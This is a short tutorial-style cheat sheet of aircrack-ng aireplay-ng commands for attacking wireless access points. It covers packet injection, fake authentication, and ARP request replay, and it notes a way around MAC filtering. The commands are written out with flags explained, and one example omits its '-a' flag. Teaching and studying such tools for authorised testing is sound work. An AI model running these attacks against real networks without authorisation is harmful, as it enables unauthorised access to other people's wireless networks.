Wireless Attacks: Part I

Common Commands Used in Aircrack-ng

injection command

aireplay-ng -3 -b <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
Fake Authentication Commands

aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> ath0
aireplay-ng -1 0 -e linksys-a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
Or another variation for picky access points

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Arp Replay Attack

aireplay-ng -3 -b 00:13:10:30:24:9C  mon0

Where:
-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
Basic usage:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Where:

-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
ath0 is the wireless interface name
There are two methods of replaying an ARP which was previously injected. The first and simplest method is to use the same

command plus the ”-r” to read the output file from your last successful ARP replay.

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
Where:

-3 means standard arp request replay
-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless interface name
The second method is a special case of the interactive packet replay attack. It is presented here since it is complementary to the ARP request replay attack.

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
Where:

-2 means interactive frame selection
-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
ath0 is the wireless card interface name
“NOTE” Some access points are configured to only allow selected MAC access to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know
one of the MAC addresses on the allowed list.Thus, the advantage of the next technique (interactive replay) is that it gets around this control.